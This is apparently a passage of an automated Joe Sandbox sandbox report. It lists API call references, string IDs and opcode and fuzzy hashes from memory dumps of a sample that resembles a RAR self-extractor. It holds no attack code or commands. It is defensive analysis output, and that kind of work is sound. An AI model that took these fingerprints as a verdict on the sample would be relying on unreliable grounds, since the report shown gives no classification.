                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                          • String ID: %s%s%u
                                                                                          • API String ID: 2892007947-1360425832
                                                                                          • Opcode ID: 675799794a158365415f617dc4aa3d65009c79f20a3f60be9a41a32abbf0046d
                                                                                          • Instruction ID: 0181dd9787b85ce91bf6b18391305fc73f162dfc7c3f2922a64239fc9f609316
                                                                                          • Opcode Fuzzy Hash: 675799794a158365415f617dc4aa3d65009c79f20a3f60be9a41a32abbf0046d
                                                                                          • Instruction Fuzzy Hash: 5A417172900219EEDF26DB60DD85FEEB7BCAB08341F0140A7F509EA151EB709A948F54
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                          • String ID: %08x
                                                                                          • API String ID: 1593746830-3682738293
                                                                                          • Opcode ID: 0a6dbb070215d90fb72a0df63dfc5ae1c977448b872852832d423ace986d2502
                                                                                          • Instruction ID: 295b2e29fb4653eea5825078df28c3f5df5f7613b9be511c93a32169719b8e1c
                                                                                          • Opcode Fuzzy Hash: 0a6dbb070215d90fb72a0df63dfc5ae1c977448b872852832d423ace986d2502
                                                                                          • Instruction Fuzzy Hash: C141D136914358AAE736E624CC49FFB63ECEB85710F06052EF948EB192D674ED44C3A1
                                                                                          APIs
                                                                                          • ShowWindow.USER32(?,00000000), ref: 003D85B5
                                                                                          • GetWindowRect.USER32(?,?), ref: 003D85DA
                                                                                          • ShowWindow.USER32(?,00000005,?), ref: 003D8671
                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 003D8679
                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 003D868F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Show$RectText
                                                                                          • String ID: RarHtmlClassName
                                                                                          • API String ID: 3937224194-1658105358
                                                                                          • Opcode ID: 99192503099b9d980b5136d5a6c4c1e964ab2fe66a2b4b987575ab1285e35edf
                                                                                          • Instruction ID: b3c08b73e37e71f5ed2c462b8fc8582a92d23a913f5bd151d29bd48e9ac12932
                                                                                          • Opcode Fuzzy Hash: 99192503099b9d980b5136d5a6c4c1e964ab2fe66a2b4b987575ab1285e35edf
                                                                                          • Instruction Fuzzy Hash: 4831A4B2500314AFC7129F64AD49E2BBBADEB48711F004456FE499A291DB70ED04CBA2
                                                                                          APIs
                                                                                            • Part of subcall function 003E92D3: _free.LIBCMT ref: 003E92FC
                                                                                          • _free.LIBCMT ref: 003E935D
                                                                                            • Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
                                                                                            • Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA
                                                                                          • _free.LIBCMT ref: 003E9368
                                                                                          • _free.LIBCMT ref: 003E9373
                                                                                          • _free.LIBCMT ref: 003E93C7
                                                                                          • _free.LIBCMT ref: 003E93D2
                                                                                          • _free.LIBCMT ref: 003E93DD
                                                                                          • _free.LIBCMT ref: 003E93E8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                          • Instruction ID: 5eb9f04c0aa61f738546a013a3a6051be6f0829e892f733a3b2f9a598b15364c
                                                                                          • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                          • Instruction Fuzzy Hash: CA115E71941BA8F6DD22B772CC07FCB779C5F41704F408E16B699AA0D2DB34B5044750
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,003E0C0B,003DE662), ref: 003E0C22
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003E0C30
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003E0C49
                                                                                          • SetLastError.KERNEL32(00000000,?,003E0C0B,003DE662), ref: 003E0C9B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 6a83e2fe695dc5b022fdfa12462447b0a80365c873aa8c84c60edb1e980db3a9
                                                                                          • Instruction ID: a473f4b69fa9bf3e845fd2588575c87d0fa9c6455f9c3e9ac958abf61e444871
                                                                                          • Opcode Fuzzy Hash: 6a83e2fe695dc5b022fdfa12462447b0a80365c873aa8c84c60edb1e980db3a9
                                                                                          • Instruction Fuzzy Hash: C501D472249BB25EA72B26B66CC5977264CEB413B5F32032AF5144C1E2EFA15C809180
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                          • API String ID: 0-1718035505
                                                                                          • Opcode ID: a45cb11a562e0968cf63e78378c6a6349c21d4cdc46675972db1c1c2681b041e
                                                                                          • Instruction ID: 36ffc113aa16c5e2663f288a9d5fd3367c68fd4f9506c42087226b81d1ec7fc7
                                                                                          • Opcode Fuzzy Hash: a45cb11a562e0968cf63e78378c6a6349c21d4cdc46675972db1c1c2681b041e
                                                                                          • Instruction Fuzzy Hash: DF01A9736B22239B8F231EB5BC84EF663C89A06791312653BE511D7350DB11C885FBE5
                                                                                          APIs
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003D00AE
                                                                                            • Part of subcall function 003CA8E0: GetVersionExW.KERNEL32(?), ref: 003CA905
                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003D00D0
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003D00EA
                                                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 003D00FB
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003D010B
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003D0117
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                          • String ID:
                                                                                          • API String ID: 2092733347-0
                                                                                          • Opcode ID: b2990f8b5b8440fed3c00e34c0c0080f6f16cbb1dc4fe589189c2ed206dd2458
                                                                                          • Instruction ID: c2842f78851c34aa694f433e14b09c1ba60041e30baf28921fe9a93a9a3f8679
                                                                                          • Opcode Fuzzy Hash: b2990f8b5b8440fed3c00e34c0c0080f6f16cbb1dc4fe589189c2ed206dd2458
                                                                                          • Instruction Fuzzy Hash: 5131C47A1083469BC705DFA9D9809ABB7F8FF98704F04491EF999C3210E630D549CB66
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 2931989736-0
                                                                                          • Opcode ID: 4f2c7a50154aaef134efab7d8ba9494870dce933196efa62f3d308b82bdc018a
                                                                                          • Instruction ID: aac0b480feebb41d284fc6ec518fb69f8008caa4f9be3f927c83737cc79e038a
                                                                                          • Opcode Fuzzy Hash: 4f2c7a50154aaef134efab7d8ba9494870dce933196efa62f3d308b82bdc018a
                                                                                          • Instruction Fuzzy Hash: 2521867360050AABD7466B20FC81E7B7BACAF54798B15492AFD089E302F774ED4547D0
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003CFB07
                                                                                          • EnterCriticalSection.KERNEL32(00401E74,00000000,?,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF,?), ref: 003CFB15
                                                                                          • new.LIBCMT ref: 003CFB35
                                                                                          • new.LIBCMT ref: 003CFB6B
                                                                                          • LeaveCriticalSection.KERNEL32(00401E74,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF,?,00008000,?), ref: 003CFB8B
                                                                                          • LeaveCriticalSection.KERNEL32(00401E74,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF,?,00008000,?), ref: 003CFB96
                                                                                            • Part of subcall function 003CF930: InitializeCriticalSection.KERNEL32(000001A0,00401E74,00000000,?,?,003CFB88,00000020,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?), ref: 003CF969
                                                                                            • Part of subcall function 003CF930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF), ref: 003CF973
                                                                                            • Part of subcall function 003CF930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF), ref: 003CF983
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                          • String ID:
                                                                                          • API String ID: 3919453512-0
                                                                                          • Opcode ID: 24388f7f158c7875e4a97f67e1c1eac5f56d912dc2be5be0dbca4670c9b6b762
                                                                                          • Instruction ID: 7bb00790545ef8742e0b5e739b0c9255e5b38fcf719bfdb27650c35606b4ab4a
                                                                                          • Opcode Fuzzy Hash: 24388f7f158c7875e4a97f67e1c1eac5f56d912dc2be5be0dbca4670c9b6b762
                                                                                          • Instruction Fuzzy Hash: 4A117335A10212AFD7069B68ED15F7D76BAAB49750F11413EF809E73E1DB708C00CB94
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,003FCBE8,003E2674,003FCBE8,?,?,003E2213,?,?,003FCBE8), ref: 003E6323
                                                                                          • _free.LIBCMT ref: 003E6356
                                                                                          • _free.LIBCMT ref: 003E637E
                                                                                          • SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E638B
                                                                                          • SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E6397
                                                                                          • _abort.LIBCMT ref: 003E639D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 9c3685aff69ad570a0668c9605c017aebd1c3951eec855026875e557b41e6e11
                                                                                          • Instruction ID: a2e3d6d46be26f65b511aabc082146bf8eb7e732ac9e08d9d449a4d7b82c8536
                                                                                          • Opcode Fuzzy Hash: 9c3685aff69ad570a0668c9605c017aebd1c3951eec855026875e557b41e6e11
                                                                                          • Instruction Fuzzy Hash: 51F0F97A605BB126CB13273B6D4BB6A121D8FE27F1F360314F528961F3EF3188018151
                                                                                          APIs
                                                                                          • CharUpperW.USER32(?,?,?,?,00001000), ref: 003DA92C
                                                                                          • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 003DA953
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharUpper
                                                                                          • String ID: *a@$-
                                                                                          • API String ID: 9403516-174350541
                                                                                          • Opcode ID: 80a85438e0a112dfbc017c9f90774331c46f717521da4ddf0f34c805c66c9d34
                                                                                          • Instruction ID: 67f0fd483c04e514fecf8904ceb565a0f15b6e3cab25aadec837b62add52879c
                                                                                          • Opcode Fuzzy Hash: 80a85438e0a112dfbc017c9f90774331c46f717521da4ddf0f34c805c66c9d34
                                                                                          • Instruction Fuzzy Hash: F221F87340870E55D7139B28AB2CB77A798E785315F03482BF584DAB81E774C8A4D367
                                                                                          APIs
                                                                                            • Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
                                                                                            • Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341
                                                                                          • EndDialog.USER32(?,00000001), ref: 003DB86B
                                                                                          • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 003DB881
                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 003DB89B
                                                                                          • SetDlgItemTextW.USER32(?,00000066), ref: 003DB8A6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$DialogWindow
                                                                                          • String ID: RENAMEDLG
                                                                                          • API String ID: 445417207-3299779563
                                                                                          • Opcode ID: 5bb8961fdca667ad039af570142b4b81198967439e26fe87e857f57e4b3945ea
                                                                                          • Instruction ID: 1b003b8325855acd6319587902067909c7ceb42fd314abe0e8df0e730edb3f63
                                                                                          • Opcode Fuzzy Hash: 5bb8961fdca667ad039af570142b4b81198967439e26fe87e857f57e4b3945ea
                                                                                          • Instruction Fuzzy Hash: 5C01F973A40255F6D6134A657E44F77BB6CEB85F41F12042BF204B2590C3569C04E776
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003E4A90,?,?,003E4A30,?,003F7F68,0000000C,003E4B87,?,00000002), ref: 003E4AFF
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003E4B12
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,003E4A90,?,?,003E4A30,?,003F7F68,0000000C,003E4B87,?,00000002,00000000), ref: 003E4B35
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 4d996d6dc9e80b89babcae97fa0d0c6673c465fc3914003071581bb290b7d795
                                                                                          • Instruction ID: 2f6422da1a08680de6a57e598ccc9e3fa9b970baaf576380f9188bbd81591dc2
                                                                                          • Opcode Fuzzy Hash: 4d996d6dc9e80b89babcae97fa0d0c6673c465fc3914003071581bb290b7d795
                                                                                          • Instruction Fuzzy Hash: 4BF0AF35A00219BFCB0B9F99DC49BFEBFB8EF08712F010165F805A2291DB709940CA90
                                                                                          APIs
                                                                                            • Part of subcall function 003CF309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003CF324
                                                                                            • Part of subcall function 003CF309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003CDEC8,Crypt32.dll,?,003CDF4A,?,003CDF2E,?,?,?,?), ref: 003CF346
                                                                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 003CDED4
                                                                                          • GetProcAddress.KERNEL32(00401E58,CryptUnprotectMemory), ref: 003CDEE4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                          • API String ID: 2141747552-1753850145
                                                                                          • Opcode ID: 7b106ff1627cdba75b162444d3a9832cf7003e30cce138611df01a51324970b3
